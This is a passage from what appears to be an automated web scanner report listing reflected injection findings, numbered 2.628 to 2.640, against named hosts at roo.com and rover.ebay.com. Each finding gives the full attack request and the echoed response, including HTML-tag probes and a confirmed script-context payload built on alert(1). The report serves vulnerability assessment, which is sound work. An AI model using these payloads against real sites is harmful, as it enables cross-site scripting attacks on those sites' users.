GET /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx?siteid=8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995&81c0b<a>3124755a259=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:18 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995&81c0b<a>3124755a259=1/ChannelInfoService.asmx" />
...[SNIP]...

2.628. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload c8a9f<a>75b4aef6ed0 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx?siteid=8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995c8a9f<a>75b4aef6ed0 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:16 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995c8a9f<a>75b4aef6ed0/ChannelInfoService.asmx" />
...[SNIP]...

2.629. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 606ab<a>3fb066d0da6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx?siteid=8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995&606ab<a>3fb066d0da6=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:16 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995&606ab<a>3fb066d0da6=1/PlaylistInfoService.asmx" />
...[SNIP]...

2.630. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 2aee5<a>4306649dad was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/PlaylistInfoService.aspx?siteid=8dbfb0ba-4add-46fb-a53d-245440ef71a4-2029952aee5<a>4306649dad HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:15 GMT
Connection: close
Content-Length: 27382

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-2029952aee5<a>4306649dad/PlaylistInfoService.asmx" />
...[SNIP]...

2.631. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35277<a>41ba0f9bd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx?siteid=a437cd50-7db7-4848-a974-e35c55c6dcca-203031&35277<a>41ba0f9bd80=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:13 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031&35277<a>41ba0f9bd80=1/ChannelInfoService.asmx" />
...[SNIP]...

2.632. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload af560<a>7cb9ec533cf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/ChannelInfoService.aspx?siteid=a437cd50-7db7-4848-a974-e35c55c6dcca-203031af560<a>7cb9ec533cf HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:12 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031af560<a>7cb9ec533cf/ChannelInfoService.asmx" />
...[SNIP]...

2.633. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4b61f<a>325672bb22f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx?siteid=a437cd50-7db7-4848-a974-e35c55c6dcca-203031&4b61f<a>325672bb22f=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:13 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031&4b61f<a>325672bb22f=1/PlaylistInfoService.asmx" />
...[SNIP]...

2.634. http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 5c650<a>38392ddfbef was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a437cd50-7db7-4848-a974-e35c55c6dcca-203031/PlaylistInfoService.aspx?siteid=a437cd50-7db7-4848-a974-e35c55c6dcca-2030315c650<a>38392ddfbef HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:14:12 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/a437cd50-7db7-4848-a974-e35c55c6dcca-2030315c650<a>38392ddfbef/PlaylistInfoService.asmx" />
...[SNIP]...

2.635. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c2bd3<a>74b4e97165d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx?siteid=e7257f85-714e-4527-a4b4-7767aa0fa098-104147&c2bd3<a>74b4e97165d=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:11:24 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147&c2bd3<a>74b4e97165d=1/ChannelInfoService.asmx" />
...[SNIP]...

2.636. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload c1525<a>bc198413de4 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/ChannelInfoService.aspx?siteid=e7257f85-714e-4527-a4b4-7767aa0fa098-104147c1525<a>bc198413de4 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:11:23 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147c1525<a>bc198413de4/ChannelInfoService.asmx" />
...[SNIP]...

2.637. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f8b8e<a>128fbd0ddf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx?siteid=e7257f85-714e-4527-a4b4-7767aa0fa098-104147&f8b8e<a>128fbd0ddf0=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:11:26 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147&f8b8e<a>128fbd0ddf0=1/PlaylistInfoService.asmx" />
...[SNIP]...

2.638. http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 93735<a>687c689ee35 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e7257f85-714e-4527-a4b4-7767aa0fa098-104147/PlaylistInfoService.aspx?siteid=e7257f85-714e-4527-a4b4-7767aa0fa098-10414793735<a>687c689ee35 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/verizon/central/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 02:11:24 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/e7257f85-714e-4527-a4b4-7767aa0fa098-10414793735<a>687c689ee35/PlaylistInfoService.asmx" />
...[SNIP]...

2.639. http://rover.ebay.com/ar/1/73255/4 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /ar/1/73255/4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d28bd"%3balert(1)//664779ea8e7 was submitted in the mpvc parameter. This input was echoed as d28bd";alert(1)//664779ea8e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar/1/73255/4?mpt=1290348141&Perf_Tracker_1=0000778963&Perf_Tracker_2=0000857197&Perf_Tracker_3=1183&imp_id=7390300332479263209&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=728x90&adid=290222&mpvc=http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOmx4DT_no9mfxe8qqcfxE5tJulMAAAAAFxIAgBkAAAAZAAAAAIAAACGgwEAAQAAAFVTRABVU0QA2AJaAKAEAACUBwACAwIFAAAAAABXE3uK/cnd=!HyTSyAjuDhCGhwYYyG0groIBKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFCEwgKEAAYACACKP7__________wFCEwgLEAAYACADKP7__________wFIAFAAWKAJ/referrer=http%253A%252F%252Fwww.drudgereport.com%252F/clickenc=http%253A%252F%252Fr1.ace.advertising.com%252Fclick%252Fsite%253D0000778963%252Fmnum%253D0000857197%252Fcstr%253D18249923%253D_4ce9266d%252C8572034715%252C778963%255E857197%255E1183%255E0%252C1_%252Fxsxdata%253D%2524xsxdata%252Fbnum%253D18249923%252Foptn%253D64%253Ftrg%253Dd28bd"%3balert(1)//664779ea8e7 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: npii=btrm/svid%3D916267332304eca4085^cguid/66612c7712c0a0aad396b2c6fef710ef4eca4085^
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: rover.ebay.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 14:19:30 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:25:33 GMT
ETag: "6ba053-203c-49510ab4fed40"
Accept-Ranges: bytes
Content-Length: 22714
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );

/******** DAP Code ********/
var UTCoffset=0;
var UTCdt=0;
var engStartTime=0;
var engTime=0;
var engEvent=new Array();
var engData=new Array();
var above
...[SNIP]...
dvertising.com%2Fclick%2Fsite%3D0000778963%2Fmnum%3D0000857197%2Fcstr%3D18249923%3D_4ce9266d%2C8572034715%2C778963%5E857197%5E1183%5E0%2C1_%2Fxsxdata%3D%24xsxdata%2Fbnum%3D18249923%2Foptn%3D64%3Ftrg%3Dd28bd";alert(1)//664779ea8e7http://rover.ebay.com%2Frover%2F1%2F711-112902-2042-4%2F4%3Fmpt%3D1290348141%26siteid%3D0%26Perf_Tracker_1%3D0000778963%26Perf_Tracker_2%3D0000857197%26Perf_Tracker_3%3D1183%26adid%3D290222%26imp_id%3D
...[SNIP]...

2.640. http://rover.ebay.com/ar/1/73255/4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /ar/1/73255/4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df566"%3balert(1)//cf67b87541e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df566";alert(1)//cf67b87541e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

